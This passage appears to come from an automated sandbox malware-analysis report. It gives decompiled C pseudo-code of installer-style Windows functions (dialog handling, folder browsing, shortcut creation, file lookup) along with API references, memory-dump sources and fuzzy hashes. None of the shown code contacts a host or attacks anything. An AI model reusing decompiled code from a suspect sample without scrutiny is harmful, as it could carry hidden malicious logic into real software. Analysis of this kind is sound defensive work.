								E0040521C(0, _t110);
								E004054CC(_t151);
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);
					E00403DDC(_t144);
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}




































            0x004041eb
            0x004041f2
            0x004041fe
            0x0040420c
            0x00404214
            0x00404218
            0x0040421e
            0x0040421e
            0x0040422a
            0x004042a4
            0x004042ab
            0x00404377
            0x0040437e
            0x0040438d
            0x0040438d
            0x00404391
            0x00404397
            0x0040439a
            0x004043a7
            0x004043a9
            0x004043a9
            0x004043b7
            0x004043bd
            0x004043c4
            0x004043c6
            0x004043c6
            0x004043d3
            0x004043df
            0x00404403
            0x00404414
            0x0040441a
            0x0040441c
            0x00000000
            0x00000000
            0x00404422
            0x00404422
            0x00404430
            0x00000000
            0x004043e1
            0x004043e4
            0x004043e8
            0x004043ec
            0x004043ed
            0x004043f2
            0x00000000
            0x00000000
            0x004043fa
            0x00404432
            0x00404432
            0x00404439
            0x00404442
            0x00404444
            0x00404444
            0x00404456
            0x00404460
            0x00404468
            0x0040447e
            0x0040446a
            0x0040446e
            0x0040446e
            0x00404468
            0x00404483
            0x00404488
            0x0040448d
            0x00404496
            0x00404496
            0x0040449f
            0x004044a1
            0x004044a1
            0x004044ad
            0x004044b5
            0x004044bf
            0x004044bf
            0x004044c4
            0x00000000
            0x004044c4
            0x004043df
            0x00404380
            0x00404387
            0x00000000
            0x00000000
            0x00000000
            0x00404387
            0x004042b1
            0x004042b7
            0x004042d1
            0x004042d6
            0x004042e0
            0x004042e7
            0x004042ec
            0x004042f6
            0x004042f9
            0x004042fc
            0x00404303
            0x0040430b
            0x0040430e
            0x00404312
            0x00404319
            0x00404321
            0x00404370
            0x00404323
            0x00404324
            0x0040432a
            0x00404334
            0x0040433c
            0x0040433e
            0x0040433f
            0x00404341
            0x00404347
            0x00404355
            0x00404359
            0x00404359
            0x00404355
            0x0040435e
            0x00404369
            0x00404369
            0x00404321
            0x00000000
            0x004042d6
            0x004042c4
            0x00000000
            0x00000000
            0x004042ca
            0x00000000
            0x0040422c
            0x00404237
            0x00404240
            0x0040424d
            0x0040424d
            0x00404257
            0x0040425c
            0x00404265
            0x00404268
            0x0040426d
            0x00404275
            0x00404278
            0x0040427d
            0x00404283
            0x00404292
            0x00404299
            0x004044ca
            0x004044dc
            0x004044dc
            0x004042a2
            0x00000000
            0x004042a2

            APIs
            • GetDlgItem.USER32 ref: 00404230
            • SetWindowTextA.USER32(00000000,?), ref: 0040425C
            • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
            • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
            • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
            • SetDlgItemTextA.USER32 ref: 00404369
              • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
            • SetDlgItemTextA.USER32 ref: 0040447E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
            • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
            • API String ID: 2007447535-1909522251
            • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
            • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
            • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
            • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
            Download Yara Rule
            C-Code - Quality: 74%
            			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405538(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409418 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















            0x004020af
            0x004020b9
            0x004020c2
            0x004020cc
            0x004020d5
            0x004020df
            0x004020e3
            0x004020e3
            0x004020e8
            0x004020f9
            0x00402101
            0x004021df
            0x004021df
            0x004021e6
            0x00402107
            0x00402107
            0x00402118
            0x0040211c
            0x00402122
            0x0040212c
            0x0040212e
            0x00402139
            0x0040213c
            0x00402149
            0x0040214b
            0x0040214d
            0x00402154
            0x00402157
            0x00402157
            0x0040215a
            0x00402164
            0x0040216c
            0x00402171
            0x0040217d
            0x0040217d
            0x00402180
            0x00402189
            0x0040218c
            0x00402195
            0x0040219a
            0x004021ac
            0x004021b5
            0x004021bb
            0x004021c7
            0x004021c7
            0x004021c9
            0x004021cf
            0x004021cf
            0x004021d2
            0x004021d8
            0x004021dd
            0x004021f2
            0x00000000
            0x00000000
            0x00000000
            0x004021dd
            0x004021e8
            0x00402932
            0x0040293e

            APIs
            • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ByteCharCreateInstanceMultiWide
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 123533781-47812868
            • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
            • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
            • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
            • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
            Download Yara Rule
            C-Code - Quality: 39%
            			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040591D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059BF();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




            0x004026d4
            0x004026e8
            0x004026f3
            0x004026f4
            0x00402855
            0x004026d6
            0x004026d6
            0x004026d8
            0x004026da
            0x004026da
            0x00402932
            0x0040293e

            APIs
            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileFindFirst
            • String ID:
            • API String ID: 1974802433-0
            • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
            • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
            • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
            • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02CB18A7, Relevance: .0, Instructions: 33COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
            • Instruction ID: f31aae8a0c4ab2743bef54ef87bda09f4ffcf1a7b796092de6b9c91daba54162
            • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
            • Instruction Fuzzy Hash: FE014D78A10208EFCB41DF99C58099DBBF5FF08220F158595E818E7721D371AE50EB40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02CB168F, Relevance: .0, Instructions: 10COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
            • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
            • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
            • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347windowstringCOMMON
            Download Yara Rule
            C-Code - Quality: 77%
            			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x79f56c = _t33;
					if(_t135 == 0x110) {
						 *0x7a2f84 = _t117;
						 *0x79f57c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e548 = _t89;
						E00403DA7(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
						 *0x7a274c = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x79f56c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x7a2fa0;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DF3(0x40b);
						while(1) {
							_t35 =  *0x79f56c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x7a2fa4;
							if(_t37 ==  *0x7a2fa4) {
								E00401410(1);
							}
							__eflags =  *0x7a274c;
							if( *0x7a274c != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x7ab000);
							E004059E1(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DA7(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x7a300c;
							_t136 = _t47;
							if( *0x7a300c != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DC9(_t122 & 0x00000002);
							EnableWindow( *0x79e548, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x7a300c;
							if( *0x7a300c == 0) {
								_push( *0x79f57c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x79e548);
							}
							E00403DDC();
							E004059BF(0x79f580, 0x7a2780);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x79f580[lstrlenA(0x79f580)]));
							E004059E1(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x79f580);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a2758);
									 *0x79ed58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x7a2758 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DA7(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x7a2758, 8);
											E00403DF3(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x7a300c - _t65;
								if( *0x7a300c != _t65) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t65;
								if( *0x7a3000 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2758);
						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
						__eflags =  *0x7a2f84;
						EndDialog(_t117,  *0x79e950);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x7a2758, 0x40f, 0, 1);
						__eflags =  *0x7a274c;
						return 0 |  *0x7a274c == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E0E(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x7a300c;
											if( *0x7a300c == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x79e950 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D80();
												goto L30;
											}
											E00401410(_t134);
											 *0x79e950 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x79e548);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x7a2758);
						 *0x7a2758 = _a12;
						L58:
						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x7a0580 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























            0x004038c9
            0x004038d1
            0x00403a4a
            0x00403a4e
            0x00403a52
            0x00403a54
            0x00403a59
            0x00403a64
            0x00403a6f
            0x00403a74
            0x00403a76
            0x00403a78
            0x00403a7b
            0x00403a80
            0x00403a8e
            0x00403a9b
            0x00403aa2
            0x00403aa2
            0x00403aa3
            0x00403aa3
            0x00403aa8
            0x00403ab5
            0x00403abb
            0x00403abd
            0x00403afd
            0x00403b02
            0x00403b07
            0x00403b07
            0x00403b0c
            0x00403b15
            0x00403b17
            0x00403b1c
            0x00403b22
            0x00403b26
            0x00403b26
            0x00403b2b
            0x00403b32
            0x00000000
            0x00000000
            0x00403b3d
            0x00403b43
            0x00000000
            0x00000000
            0x00403b49
            0x00403b4c
            0x00403b4f
            0x00403b54
            0x00403b59
            0x00403b5c
            0x00403b62
            0x00403b67
            0x00403b6a
            0x00403b70
            0x00403b75
            0x00403b78
            0x00403b7e
            0x00403b86
            0x00403b8c
            0x00403b93
            0x00403b95
            0x00403b9c
            0x00403b9c
            0x00403b9c
            0x00403ba6
            0x00403bb5
            0x00403bc1
            0x00403bd0
            0x00403be7
            0x00403be9
            0x00403bef
            0x00403c04
            0x00403bf1
            0x00403bfa
            0x00403bfc
            0x00403bfc
            0x00403c0a
            0x00403c1a
            0x00403c1f
            0x00403c2a
            0x00403c2b
            0x00403c32
            0x00403c38
            0x00403c3c
            0x00403c41
            0x00403c43
            0x00000000
            0x00403c49
            0x00403c49
            0x00403c4b
            0x00000000
            0x00000000
            0x00403c51
            0x00403c55
            0x00403c7a
            0x00403c80
            0x00403c86
            0x00403c89
            0x00403caf
            0x00403cb5
            0x00403cb7
            0x00403cbc
            0x00403cc2
            0x00403cc5
            0x00403cc8
            0x00403cdf
            0x00403ceb
            0x00403d06
            0x00403d0c
            0x00403d10
            0x00403d1d
            0x00403d28
            0x00403d28
            0x00403cbc
            0x00000000
            0x00403c89
            0x00403c57
            0x00403c5d
            0x00000000
            0x00000000
            0x00403c63
            0x00403c69
            0x00000000
            0x00000000
            0x00000000
            0x00403c6f
            0x00403c43
            0x00403d35
            0x00403d41
            0x00403d41
            0x00403d49
            0x00000000
            0x00403abf
            0x00403abf
            0x00403ac2
            0x00403af5
            0x00403af5
            0x00403af7
            0x00000000
            0x00000000
            0x00000000
            0x00403af7
            0x00403ac4
            0x00403ac8
            0x00403acd
            0x00403acf
            0x00000000
            0x00000000
            0x00403adf
            0x00403ae7
            0x00000000
            0x00403aed
            0x004038e3
            0x004038e3
            0x004038ea
            0x004038fb
            0x004038fb
            0x00403904
            0x0040390d
            0x00403918
            0x00403918
            0x00403924
            0x00403940
            0x00403943
            0x00403958
            0x0040395b
            0x00403990
            0x00403990
            0x00403996
            0x00403a37
            0x00000000
            0x00403a40
            0x0040399c
            0x004039af
            0x004039b1
            0x004039b3
            0x004039d0
            0x004039d3
            0x004039d5
            0x004039da
            0x004039dd
            0x004039ec
            0x004039ef
            0x00403a22
            0x00403a35
            0x00000000
            0x00403a35
            0x004039f1
            0x004039f8
            0x00403a11
            0x00403a16
            0x00403a18
            0x00000000
            0x00000000
            0x00403a1a
            0x00403a06
            0x00403a06
            0x00403a08
            0x00403a08
            0x00000000
            0x00403a08
            0x004039fb
            0x00403a00
            0x00000000
            0x00403a00
            0x004039df
            0x004039e6
            0x00000000
            0x00000000
            0x004039e8
            0x00000000
            0x004039e8
            0x004039d7
            0x00000000
            0x004039d7
            0x004039bf
            0x004039c2
            0x004039c8
            0x004039ca
            0x00000000
            0x00000000
            0x00000000
            0x004039ca
            0x00403963
            0x00403969
            0x00000000
            0x00000000
            0x00403975
            0x0040397b
            0x0040397d
            0x00000000
            0x00000000
            0x00403983
            0x00403988
            0x00000000
            0x00403988
            0x0040394a
            0x00000000
            0x00403926
            0x0040392c
            0x00403936
            0x00403d4f
            0x00403d56
            0x00403d64
            0x00403d6a
            0x00403d6a
            0x00403d74
            0x00000000
            0x00403d74
            0x00403924

            APIs
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
            • ShowWindow.USER32(?), ref: 00403918
            • DestroyWindow.USER32 ref: 0040392C
            • SetWindowLongA.USER32 ref: 0040394A
            • IsWindowEnabled.USER32 ref: 00403975
            • GetDlgItem.USER32 ref: 004039A3
            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
            • IsWindowEnabled.USER32(00000000), ref: 004039C2
            • GetDlgItem.USER32 ref: 00403A6A
            • GetDlgItem.USER32 ref: 00403A74
            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
            • GetDlgItem.USER32 ref: 00403B86
